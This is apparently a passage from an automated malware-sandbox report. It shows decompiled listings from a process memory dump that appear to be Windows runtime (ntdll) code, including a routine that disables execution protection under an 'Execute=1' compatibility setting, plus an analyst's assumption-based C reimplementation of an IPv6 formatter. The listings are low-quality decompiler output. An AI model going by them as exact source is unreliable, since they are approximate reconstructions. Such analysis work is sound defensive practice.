                                      							_v32 = E0259E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                      						}
                                      						if(_v32 == _t318) {
                                      							_v52 = _t318;
                                      							L58:
                                      							_t329 = 0xc0000017;
                                      							goto L47;
                                      						} else {
                                      							E02592340(_v32, _v8, _v24);
                                      							_v16 = _v32;
                                      							_a4 = _t318;
                                      							_t235 = E025AE679(_v32, _t332);
                                      							while(1) {
                                      								_t319 = _t235;
                                      								if(_t319 == 0) {
                                      									break;
                                      								}
                                      								 *_t319 = 0;
                                      								_t321 = _t319 + 2;
                                      								E0259E2A8(_t322,  &_v68, _v16);
                                      								if(E025B5553(_t328,  &_v68,  &_v36) != 0) {
                                      									_a4 = _a4 + 1;
                                      								}
                                      								_v16 = _t321;
                                      								_t235 = E025AE679(_t321, _t332);
                                      								_pop(_t322);
                                      							}
                                      							_t236 = _v16;
                                      							if( *_v16 != _t319) {
                                      								E0259E2A8(_t322,  &_v68, _t236);
                                      								if(E025B5553(_t328,  &_v68,  &_v36) != 0) {
                                      									_a4 = _a4 + 1;
                                      								}
                                      							}
                                      							if(_a4 == 0) {
                                      								E0259E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
                                      								_v52 = _v52 & 0x00000000;
                                      								_v32 = _v32 & 0x00000000;
                                      							}
                                      							if(_v8 != 0) {
                                      								E0259E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                      							}
                                      							_v8 = _v8 & 0x00000000;
                                      							_t318 = 0;
                                      							goto L46;
                                      						}
                                      					}
                                      					_t257 = _v24;
                                      					_t322 = _t257 + 4;
                                      					_push(_t257);
                                      					_v40 = _t322;
                                      					E025B718A(_t257);
                                      					_t338 = _t335 + 4;
                                      					if(_t322 == _t318) {
                                      						_v20 = _t318;
                                      					} else {
                                      						_v20 = E0259E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                      					}
                                      					if(_v20 == _t318) {
                                      						_v40 = _t318;
                                      						goto L58;
                                      					} else {
                                      						E02592340(_v20, _v8, _v24);
                                      						_v16 = _v20;
                                      						_a4 = _t318;
                                      						_t261 = E025AE679(_v20, _t332);
                                      						_t335 = _t338 + 0x14;
                                      						while(1) {
                                      							_v12 = _t261;
                                      							if(_t261 == _t318) {
                                      								break;
                                      							}
                                      							_v12 = _v12 + 2;
                                      							 *_v12 = 0;
                                      							E0259E2A8(_v12,  &_v68, _v16);
                                      							if(E025B5553(_t328,  &_v68,  &_v36) != 0) {
                                      								_a4 = _a4 + 1;
                                      							}
                                      							_v16 = _v12;
                                      							_t261 = E025AE679(_v12, _t332);
                                      							_pop(_t322);
                                      						}
                                      						_t269 = _v16;
                                      						if( *_v16 != _t318) {
                                      							E0259E2A8(_t322,  &_v68, _t269);
                                      							if(E025B5553(_t328,  &_v68,  &_v36) != 0) {
                                      								_a4 = _a4 + 1;
                                      							}
                                      						}
                                      						if(_a4 == _t318) {
                                      							E0259E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                      							_v40 = _t318;
                                      							_v20 = _t318;
                                      						}
                                      						if(_v8 != _t318) {
                                      							E0259E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                      						}
                                      						_v8 = _t318;
                                      						goto L30;
                                      					}
                                      				}
                                      				_t284 = _v24;
                                      				_t322 = _t284 + 4;
                                      				_push(_t284);
                                      				_v48 = _t322;
                                      				E025B718A(_t284);
                                      				_t339 = _t335 + 4;
                                      				if(_t322 == _t318) {
                                      					_v28 = _t318;
                                      				} else {
                                      					_v28 = E0259E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                      				}
                                      				if(_v28 == _t318) {
                                      					_v48 = _t318;
                                      					goto L58;
                                      				} else {
                                      					E02592340(_v28, _v8, _v24);
                                      					_v16 = _v28;
                                      					_a4 = _t318;
                                      					_t288 = E025AE679(_v28, _t332);
                                      					_t335 = _t339 + 0x14;
                                      					while(1) {
                                      						_v12 = _t288;
                                      						if(_t288 == _t318) {
                                      							break;
                                      						}
                                      						_v12 = _v12 + 2;
                                      						 *_v12 = 0;
                                      						E0259E2A8(_v12,  &_v68, _v16);
                                      						if(E025B5553(_t328,  &_v68,  &_v36) != 0) {
                                      							_a4 = _a4 + 1;
                                      						}
                                      						_v16 = _v12;
                                      						_t288 = E025AE679(_v12, _t332);
                                      						_pop(_t322);
                                      					}
                                      					_t296 = _v16;
                                      					if( *_v16 != _t318) {
                                      						E0259E2A8(_t322,  &_v68, _t296);
                                      						if(E025B5553(_t328,  &_v68,  &_v36) != 0) {
                                      							_a4 = _a4 + 1;
                                      						}
                                      					}
                                      					if(_a4 == _t318) {
                                      						E0259E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
                                      						_v48 = _t318;
                                      						_v28 = _t318;
                                      					}
                                      					if(_v8 != _t318) {
                                      						E0259E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                      					}
                                      					_v8 = _t318;
                                      					goto L17;
                                      				}
                                      			}
                                      0x025b8a7d
                                      0x025b8a91
                                      0x025b8a93
                                      0x025b8a93
                                      0x025b8a98
                                      0x025b8a9b
                                      0x025b8aa1
                                      0x025b8aa1
                                      0x025b8aa4
                                      0x025b8aaa
                                      0x025b8ab1
                                      0x025b8ac5
                                      0x025b8ac7
                                      0x025b8ac7
                                      0x025b8ac5
                                      0x025b8ace
                                      0x02601bc9
                                      0x02601bce
                                      0x02601bd2
                                      0x02601bd2
                                      0x025b8ad8
                                      0x025b8aeb
                                      0x025b8aeb
                                      0x025b8af0
                                      0x025b8af4
                                      0x00000000
                                      0x025b8af4
                                      0x025b8a42
                                      0x025b8926
                                      0x025b8929
                                      0x025b892c
                                      0x025b892d
                                      0x025b8930
                                      0x025b8935
                                      0x025b893a
                                      0x025b8b51
                                      0x025b8940
                                      0x025b8954
                                      0x025b8954
                                      0x025b895a
                                      0x02601b63
                                      0x00000000
                                      0x025b8960
                                      0x025b8969
                                      0x025b8973
                                      0x025b8976
                                      0x025b8979
                                      0x025b897e
                                      0x025b8981
                                      0x025b8981
                                      0x025b8986
                                      0x00000000
                                      0x00000000
                                      0x02601b6e
                                      0x02601b74
                                      0x02601b7b
                                      0x02601b8f
                                      0x02601b91
                                      0x02601b91
                                      0x02601b99
                                      0x02601b9c
                                      0x02601ba2
                                      0x02601ba2
                                      0x025b898c
                                      0x025b8992
                                      0x025b8999
                                      0x025b89ad
                                      0x02601ba8
                                      0x02601ba8
                                      0x025b89ad
                                      0x025b89b6
                                      0x025b89c8
                                      0x025b89cd
                                      0x025b89d0
                                      0x025b89d0
                                      0x025b89d6
                                      0x025b89e8
                                      0x025b89e8
                                      0x025b89ed
                                      0x00000000
                                      0x025b89ed
                                      0x025b895a
                                      0x025b883e
                                      0x025b8841
                                      0x025b8844
                                      0x025b8845
                                      0x025b8848
                                      0x025b884d
                                      0x025b8852
                                      0x025b8b49
                                      0x025b8858
                                      0x025b886c
                                      0x025b886c
                                      0x025b8872
                                      0x02601b0e
                                      0x00000000
                                      0x025b8878
                                      0x025b8881
                                      0x025b888b
                                      0x025b888e
                                      0x025b8891
                                      0x025b8896
                                      0x025b8899
                                      0x025b8899
                                      0x025b889e
                                      0x00000000
                                      0x00000000
                                      0x02601b21
                                      0x02601b27
                                      0x02601b2e
                                      0x02601b42
                                      0x02601b44
                                      0x02601b44
                                      0x02601b4c
                                      0x02601b4f
                                      0x02601b55
                                      0x02601b55
                                      0x025b88a4
                                      0x025b88aa
                                      0x025b88b1
                                      0x025b88c5
                                      0x02601b5b
                                      0x02601b5b
                                      0x025b88c5
                                      0x025b88ce
                                      0x025b88e0
                                      0x025b88e5
                                      0x025b88e8
                                      0x025b88e8
                                      0x025b88ee
                                      0x025b8900
                                      0x025b8900
                                      0x025b8905
                                      0x00000000
                                      0x025b8905

                                      APIs
                                      Strings
                                      • Kernel-MUI-Number-Allowed, xrefs: 025B87E6
                                      • Kernel-MUI-Language-SKU, xrefs: 025B89FC
                                      • Kernel-MUI-Language-Allowed, xrefs: 025B8827
                                      • WindowsExcludedProcs, xrefs: 025B87C1
                                      • Kernel-MUI-Language-Disallowed, xrefs: 025B8914
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.666311106.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                      • Associated: 0000000B.00000002.666303464.0000000002570000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666389570.0000000002660000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666397028.0000000002670000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666404273.0000000002674000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666410428.0000000002677000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666416577.0000000002680000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666452455.00000000026E0000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID: _wcspbrk
                                      • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                      • API String ID: 402402107-258546922
                                      • Opcode ID: c18dc0fc56fb19ac12e599fb4641d75fc57925eda29392d40a7628e04c8b00a6
                                      • Instruction ID: 48a7cfda28b5eb284bd86bec5e6f5d5a0913c5f28c6ee7c76abfc13b14a5ff61
                                      • Opcode Fuzzy Hash: c18dc0fc56fb19ac12e599fb4641d75fc57925eda29392d40a7628e04c8b00a6
                                      • Instruction Fuzzy Hash: 77F1F9B2D00209EFCF11DF98C985AEEBBB9FF48304F14546AE505A7250E7349A45DF64
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 38%
                                      			/* Text form of a 16-byte IPv6 address (_a4) into a wide-char buffer (_a8)
                                      			   of 0x5c bytes = 46 characters. Three paths: the embedded-IPv4 forms
                                      			   "::a.b.c.d", "::ffff:a.b.c.d" and "::ffff:0:a.b.c.d"; the 0:5efe /
                                      			   200:5efe (ISATAP) case, which hex-prints six words and the last 32 bits
                                      			   dotted (the 0xfe5e and 0xfffd constants are little-endian loads of the
                                      			   bytes 5e fe and 02 00); and the generic hex form with the longest run of
                                      			   zero words collapsed to "::" (a run of one word stays "0"). E025C7707 is
                                      			   the swprintf-style formatter (API ID ___swprintf_l below). */
                                      			E025D13CB(intOrPtr* _a4, intOrPtr _a8) {
                                      				char _v8;
                                      				intOrPtr _v12;
                                      				intOrPtr* _v16;
                                      				intOrPtr _v20;
                                      				char _v24;
                                      				intOrPtr _t71;
                                      				signed int _t78;
                                      				signed int _t86;
                                      				char _t90;
                                      				signed int _t91;
                                      				signed int _t96;
                                      				intOrPtr _t108;
                                      				signed int _t114;
                                      				void* _t115;
                                      				intOrPtr _t128;
                                      				intOrPtr* _t129;
                                      				void* _t130;
                                      
                                      				_t129 = _a4;
                                      				_t128 = _a8;
                                      				_t116 = 0;
                                      				_t71 = _t128 + 0x5c;
                                      				_v8 = 8;
                                      				_v20 = _t71;
                                      				if( *_t129 == 0) {
                                      					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
                                      						goto L5;
                                      					} else {
                                      						_t96 =  *(_t129 + 8) & 0x0000ffff;
                                      						if(_t96 != 0) {
                                      							L38:
                                      							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
                                      								goto L5;
                                      							} else {
                                      								_push( *(_t129 + 0xf) & 0x000000ff);
                                      								_push( *(_t129 + 0xe) & 0x000000ff);
                                      								_push( *(_t129 + 0xd) & 0x000000ff);
                                      								_t86 = E025C7707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
                                      								L36:
                                      								return _t128 + _t86 * 2;
                                      							}
                                      						}
                                      						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
                                      						if(_t114 == 0) {
                                      							L33:
                                      							_t115 = 0x2592926;
                                      							L35:
                                      							_push( *(_t129 + 0xf) & 0x000000ff);
                                      							_push( *(_t129 + 0xe) & 0x000000ff);
                                      							_push( *(_t129 + 0xd) & 0x000000ff);
                                      							_push( *(_t129 + 0xc) & 0x000000ff);
                                      							_t86 = E025C7707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
                                      							goto L36;
                                      						}
                                      						if(_t114 != 0xffff) {
                                      							_t116 = 0;
                                      							goto L38;
                                      						}
                                      						if(_t114 != 0) {
                                      							_t115 = 0x2599cac;
                                      							goto L35;
                                      						}
                                      						goto L33;
                                      					}
                                      				} else {
                                      					L5:
                                      					_a8 = _t116;
                                      					_a4 = _t116;
                                      					_v12 = _t116;
                                      					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
                                      						if( *(_t129 + 0xa) == 0xfe5e) {
                                      							_v8 = 6;
                                      						}
                                      					}
                                      					_t90 = _v8;
                                      					if(_t90 <= _t116) {
                                      						L11:
                                      						if(_a8 - _a4 <= 1) {
                                      							_a8 = _t116;
                                      							_a4 = _t116;
                                      						}
                                      						_t91 = 0;
                                      						if(_v8 <= _t116) {
                                      							L22:
                                      							if(_v8 < 8) {
                                      								_push( *(_t129 + 0xf) & 0x000000ff);
                                      								_push( *(_t129 + 0xe) & 0x000000ff);
                                      								_push( *(_t129 + 0xd) & 0x000000ff);
                                      								_t128 = _t128 + E025C7707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
                                      							}
                                      							return _t128;
                                      						} else {
                                      							L14:
                                      							if(_a4 > _t91 || _t91 >= _a8) {
                                      								if(_t91 != _t116 && _t91 != _a8) {
                                      									_push(":");
                                      									_push(_t71 - _t128 >> 1);
                                      									_push(_t128);
                                      									_t128 = _t128 + E025C7707() * 2;
                                      									_t71 = _v20;
                                      									_t130 = _t130 + 0xc;
                                      								}
                                      								_t78 = E025C7707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
                                      								_t130 = _t130 + 0x10;
                                      							} else {
                                      								_push(L"::");
                                      								_push(_t71 - _t128 >> 1);
                                      								_push(_t128);
                                      								_t78 = E025C7707();
                                      								_t130 = _t130 + 0xc;
                                      								_t91 = _a8 - 1;
                                      							}
                                      							_t91 = _t91 + 1;
                                      							_t128 = _t128 + _t78 * 2;
                                      							_t71 = _v20;
                                      							if(_t91 >= _v8) {
                                      								goto L22;
                                      							}
                                      							_t116 = 0;
                                      							goto L14;
                                      						}
                                      					} else {
                                      						_t108 = 1;
                                      						_v16 = _t129;
                                      						_v24 = _t90;
                                      						do {
                                      							if( *_v16 == _t116) {
                                      								if(_t108 - _v12 > _a8 - _a4) {
                                      									_a4 = _v12;
                                      									_a8 = _t108;
                                      								}
                                      								_t116 = 0;
                                      							} else {
                                      								_v12 = _t108;
                                      							}
                                      							_v16 = _v16 + 2;
                                      							_t108 = _t108 + 1;
                                      							_t26 =  &_v24;
                                      							 *_t26 = _v24 - 1;
                                      						} while ( *_t26 != 0);
                                      						goto L11;
                                      					}
                                      				}
                                      			}

                                      (Instruction address column for E025D13CB: 0x025d138e-0x025d14ac and 0x025fe8fd-0x025fea05 in the 0x02570000 dump; the paired disassembly text is not reproduced on this page.)

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.666311106.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                      • Associated: 0000000B.00000002.666303464.0000000002570000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666389570.0000000002660000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666397028.0000000002670000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666404273.0000000002674000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666410428.0000000002677000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666416577.0000000002680000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666452455.00000000026E0000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID: ___swprintf_l
                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                      • API String ID: 48624451-2108815105
                                      • Opcode ID: af00593a3585537e40e099d5214638b9204e0096a9a688a8724429d6cd2f1b12
                                      • Instruction ID: 6d5766b2b32a0f4400b6704f703a9caa6e3736b187264bb8becfd9a5303c7972
                                      • Opcode Fuzzy Hash: af00593a3585537e40e099d5214638b9204e0096a9a688a8724429d6cd2f1b12
                                      • Instruction Fuzzy Hash: 946105B1900A56AADF34DFADC9809BEBFB6FF84300754C52DE59A47540D334A640CB68
                                      Uniqueness

                                      Uniqueness Score: -1.00%
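                                      As a reference to hold against the E025D13CB listing above, the following is a clean C reimplementation of the same three code paths. It is example code added here, not code from the sample, the report or ntdll. Assumptions, also marked in the code: the address is taken in network byte order and each word is byte-swapped before printing (the 38%-quality listing shows no swap, and this example does not try to reproduce a wrong-endian reading); the `*(_t129 + 0xc) == 0` test is read as a check on the 16-bit word at offset 12; the ISATAP test (`& 0xfffd` and `0xfe5e` on little-endian loads) is read as word 4 in {0, 0x200} and word 5 == 0x5efe in network order; the 0x5c-byte output limit of the listing is 46 wide characters, which is `IPV6_STR_MAX` here. The names `ipv6_to_string`, `word_at`, `formats_as` and the sample addresses are constructed for the example.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Longest output is "ffff:ffff:ffff:ffff:ffff:ffff:255.255.255.255" (45) + NUL. */
#define IPV6_STR_MAX 46
/* The last four bytes as printf arguments for "%u.%u.%u.%u". */
#define DOTTED(v) (unsigned)(v)[0], (unsigned)(v)[1], (unsigned)(v)[2], (unsigned)(v)[3]

/* 16-bit word i of a 16-byte address in network byte order (in6_addr layout).
 * Assumption: the listing's unswapped "%x" is a decompiler artefact. */
static unsigned word_at(const uint8_t *a, int i)
{
    return ((unsigned)a[2 * i] << 8) | a[2 * i + 1];
}

/* Example reimplementation of the three branches of E025D13CB (not the
 * sample's or ntdll's code). Writes the text form of addr into out and
 * returns the character count, or -1 if cap < IPV6_STR_MAX. */
int ipv6_to_string(const uint8_t addr[16], char *out, size_t cap)
{
    const uint8_t *v4 = addr + 12;
    unsigned w4 = word_at(addr, 4), w5 = word_at(addr, 5);
    int nwords = 8, best_start = 0, best_end = 0, run_start = 0, i;
    char *p = out;

    if (cap < IPV6_STR_MAX)
        return -1;

    /* Words 0-3 zero and word 6 non-zero (assumed reading of +0xc): embedded IPv4. */
    if (word_at(addr, 0) == 0 && word_at(addr, 1) == 0 && word_at(addr, 2) == 0 &&
        word_at(addr, 3) == 0 && word_at(addr, 6) != 0) {
        if (w4 == 0 && (w5 == 0 || w5 == 0xffff))   /* "::a.b.c.d" / "::ffff:a.b.c.d" */
            return snprintf(out, cap, "::%s%u.%u.%u.%u", w5 ? "ffff:" : "", DOTTED(v4));
        if (w4 == 0xffff && w5 == 0)                 /* "::ffff:0:a.b.c.d" */
            return snprintf(out, cap, "::ffff:0:%u.%u.%u.%u", DOTTED(v4));
        /* any other layout falls through to the generic printer */
    }

    /* ISATAP interface id 0:5efe / 200:5efe (assumed reading of the listing's
     * 0xfffd mask and 0xfe5e): six hex words, then the last 32 bits dotted. */
    if ((w4 & 0xfdff) == 0 && w5 == 0x5efe)
        nwords = 6;

    /* Longest run of zero words, as the do/while loop in the listing does it;
     * run_start is the index just after the last non-zero word seen. */
    for (i = 0; i < nwords; i++) {
        if (word_at(addr, i) == 0) {
            if (i + 1 - run_start > best_end - best_start) {
                best_start = run_start;
                best_end = i + 1;
            }
        } else {
            run_start = i + 1;
        }
    }
    if (best_end - best_start <= 1)   /* a lone zero word is printed, not compressed */
        best_start = best_end = 0;

    for (i = 0; i < nwords; i++) {
        if (i >= best_start && i < best_end) {
            p += snprintf(p, (size_t)(out + cap - p), "::");
            i = best_end - 1;          /* the loop increment resumes after the run */
            continue;
        }
        if (i != 0 && i != best_end)   /* "::" already supplied the colon */
            p += snprintf(p, (size_t)(out + cap - p), ":");
        p += snprintf(p, (size_t)(out + cap - p), "%x", word_at(addr, i));
    }
    if (nwords < 8)
        p += snprintf(p, (size_t)(out + cap - p), ":%u.%u.%u.%u", DOTTED(v4));
    return (int)(p - out);
}

/* Constructed sample addresses (not from the report), one per code path. */
static const uint8_t ADDR_MAPPED[16]  = {0,0,0,0,0,0,0,0,0,0,0xff,0xff,192,0,2,1};
static const uint8_t ADDR_ISATAP[16]  = {0xfe,0x80,0,0,0,0,0,0,0x02,0x00,0x5e,0xfe,192,0,2,1};
static const uint8_t ADDR_TWORUNS[16] = {0x20,0x01,0x0d,0xb8,0,0,0,1,0,0,0,0,0,0,0,1};

/* Formats addr and compares the result and its length with expect. */
int formats_as(const uint8_t addr[16], const char *expect)
{
    char buf[IPV6_STR_MAX];
    int n = ipv6_to_string(addr, buf, sizeof buf);
    return n == (int)strlen(expect) && strcmp(buf, expect) == 0;
}

int main(void)
{
    char buf[IPV6_STR_MAX];
    ipv6_to_string(ADDR_MAPPED, buf, sizeof buf);  puts(buf);
    ipv6_to_string(ADDR_ISATAP, buf, sizeof buf);  puts(buf);
    ipv6_to_string(ADDR_TWORUNS, buf, sizeof buf); puts(buf);
    return 0;
}
```

The point of the comparison for an analyst: the `::ffff:0:%u.%u.%u.%u` format and the 5efe special case are the signature of a standard IPv6-to-string runtime routine, and the next function's own debug strings are prefixed `CLIENT(ntdll):`, so these two listings are library code carried in the 0x02570000 region rather than sample-specific logic; that is worth establishing before spending reversing time on them.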

                                      C-Code - Quality: 64%
                                      			/* Looks up ExecuteOptions for the image described by _a4: first CheckAppHelp
                                      			   under Image File Execution Options via E025C7F4F, then the application
                                      			   compatibility database through the function pointer at 0x2674218. A value
                                      			   that is present, non-empty and shorter than 0x214 bytes is NUL-terminated
                                      			   and, when E025A0D27(value, L"Execute=1") returns 0, walked token by token
                                      			   at spaces (E025A8375(_t71, 0x20)). _v8 is the stack cookie (*0x2672088 ^ ebp). */
                                      			E025C7EFD(void* __ecx, intOrPtr _a4) {
                                      				signed int _v8;
                                      				char _v540;
                                      				unsigned int _v544;
                                      				signed int _v548;
                                      				intOrPtr _v552;
                                      				char _v556;
                                      				void* __ebx;
                                      				void* __edi;
                                      				void* __esi;
                                      				signed int _t33;
                                      				void* _t38;
                                      				unsigned int _t46;
                                      				unsigned int _t47;
                                      				unsigned int _t52;
                                      				intOrPtr _t56;
                                      				unsigned int _t62;
                                      				void* _t69;
                                      				void* _t70;
                                      				intOrPtr _t72;
                                      				signed int _t73;
                                      				void* _t74;
                                      				void* _t75;
                                      				void* _t76;
                                      				void* _t77;
                                      
                                      				_t33 =  *0x2672088; // 0x768ef620
                                      				_v8 = _t33 ^ _t73;
                                      				_v548 = _v548 & 0x00000000;
                                      				_t72 = _a4;
                                      				if(E025C7F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
                                      					__eflags = _v548;
                                      					if(_v548 == 0) {
                                      						goto L1;
                                      					}
                                      					_t62 = _t72 + 0x24;
                                      					E025E3F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
                                      					_t71 = 0x214;
                                      					_v544 = 0x214;
                                      					E0259DFC0( &_v540, 0, 0x214);
                                      					_t75 = _t74 + 0x20;
                                      					_t46 =  *0x2674218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
                                      					__eflags = _t46;
                                      					if(_t46 == 0) {
                                      						goto L1;
                                      					}
                                      					_t47 = _v544;
                                      					__eflags = _t47;
                                      					if(_t47 == 0) {
                                      						goto L1;
                                      					}
                                      					__eflags = _t47 - 0x214;
                                      					if(_t47 >= 0x214) {
                                      						goto L1;
                                      					}
                                      					_push(_t62);
                                      					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
                                      					E025E3F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
                                      					_t52 = E025A0D27( &_v540, L"Execute=1");
                                      					_t76 = _t75 + 0x1c;
                                      					_push(_t62);
                                      					__eflags = _t52;
                                      					if(_t52 == 0) {
                                      						E025E3F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
                                      						_t71 =  &_v540;
                                      						_t56 = _t73 + _v544 - 0x218;
                                      						_t77 = _t76 + 0x14;
                                      						_v552 = _t56;
                                      						__eflags = _t71 - _t56;
                                      						if(_t71 >= _t56) {
                                      							goto L1;
                                      						} else {
                                      							goto L10;
                                      						}
                                      						while(1) {
                                      							L10:
                                      							_t62 = E025A8375(_t71, 0x20);
                                      							_pop(_t69);
                                      							__eflags = _t62;
                                      							if(__eflags != 0) {
                                      								__eflags = 0;
                                      								 *_t62 = 0;
                                      							}
                                      							E025E3F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
                                      							_t77 = _t77 + 0x10;
                                      							E0260E8DB(_t69, _t70, __eflags, _t72, _t71);
                                      							__eflags = _t62;
                                      							if(_t62 == 0) {
                                      								goto L1;
                                      							}
                                      							_t31 = _t62 + 2; // 0x2
                                      							_t71 = _t31;
                                      							__eflags = _t71 - _v552;
                                      							if(_t71 >= _v552) {
                                      								goto L1;
                                      							}
                                      						}
                                      					}
                                      					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
                                      					_push(3);
                                      					_push(0x55);
                                      					E025E3F92();
                                      					_t38 = 1;
                                      					L2:
                                      					return E0259E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
                                      				}
                                      				L1:
                                      				_t38 = 0;
                                      				goto L2;
                                      			}

                                      Instruction addresses (per-line address column of the decompiled listing above, flattened by extraction): 0x025c7f08 0x025c7f0f 0x025c7f12 0x025c7f1b 0x025c7f31 0x025e3ead 0x025e3eb4 0x00000000 0x00000000 0x025e3eba 0x025e3ecd 0x025e3ed2 0x025e3ee1 0x025e3ee7 0x025e3eec 0x025e3f12 0x025e3f18 0x025e3f1a 0x00000000 0x00000000 0x025e3f20 0x025e3f26 0x025e3f28 0x00000000 0x00000000 0x025e3f2e 0x025e3f30 0x00000000 0x00000000 0x025e3f3a 0x025e3f3b 0x025e3f53 0x025e3f64 0x025e3f69 0x025e3f6c 0x025e3f6d 0x025e3f6f 0x025ee304 0x025ee30f 0x025ee315 0x025ee31e 0x025ee321 0x025ee327 0x025ee329 0x00000000 0x00000000 0x00000000 0x00000000 0x025ee32f 0x025ee32f 0x025ee337 0x025ee33a 0x025ee33b 0x025ee33d 0x025ee33f 0x025ee341 0x025ee341 0x025ee34e 0x025ee353 0x025ee358 0x025ee35d 0x025ee35f 0x00000000 0x00000000 0x025ee365 0x025ee365 0x025ee368 0x025ee36e 0x00000000 0x00000000 0x025ee374 0x025ee32f 0x025e3f75 0x025e3f7a 0x025e3f7c 0x025e3f7e 0x025e3f86 0x025c7f39 0x025c7f47 0x025c7f47 0x025c7f37 0x025c7f37 0x00000000

                                      APIs
                                      • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 025E3F12
                                      Strings
                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 025E3F75
                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 025E3EC4
                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 025EE345
                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 025EE2FB
                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 025E3F4A
                                      • Execute=1, xrefs: 025E3F5E
                                      • ExecuteOptions, xrefs: 025E3F04
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.666311106.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                      • Associated: 0000000B.00000002.666303464.0000000002570000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666389570.0000000002660000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666397028.0000000002670000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666404273.0000000002674000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666410428.0000000002677000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666416577.0000000002680000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666452455.00000000026E0000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID: BaseDataModuleQuery
                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                      • API String ID: 3901378454-484625025
                                      • Opcode ID: 5a42875e6b306f1d3faedce7fca214e7b41ba9fee36307dca22d3883ccbee2dc
